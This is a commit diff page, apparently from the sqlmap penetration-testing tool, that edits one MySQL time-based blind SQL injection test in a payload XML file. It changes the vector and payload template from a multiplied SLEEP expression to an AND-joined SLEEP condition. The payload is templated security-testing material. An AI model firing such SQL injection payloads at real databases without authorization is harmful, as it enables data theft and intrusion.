Thanks to visit codestin.com Credit goes to github.com
We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6bcc95a commit b74edf9Copy full SHA for b74edf9
1 file changed
xml/payloads/05_time_blind.xml
@@ -1036,15 +1036,15 @@
1036
</test>
1037
1038
<test>
1039
- <title>MySQL time-based blind - Parameter replace (bool*int)</title>
+ <title>MySQL time-based blind - Parameter replace (bool)</title>
1040
<stype>5</stype>
1041
<level>4</level>
1042
<risk>1</risk>
1043
<clause>1,2,3</clause>
1044
<where>3</where>
1045
- <vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
+ <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
1046
<request>
1047
- <payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
+ <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
1048
</request>
1049
<response>
1050
<time>[SLEEPTIME]</time>
0 commit comments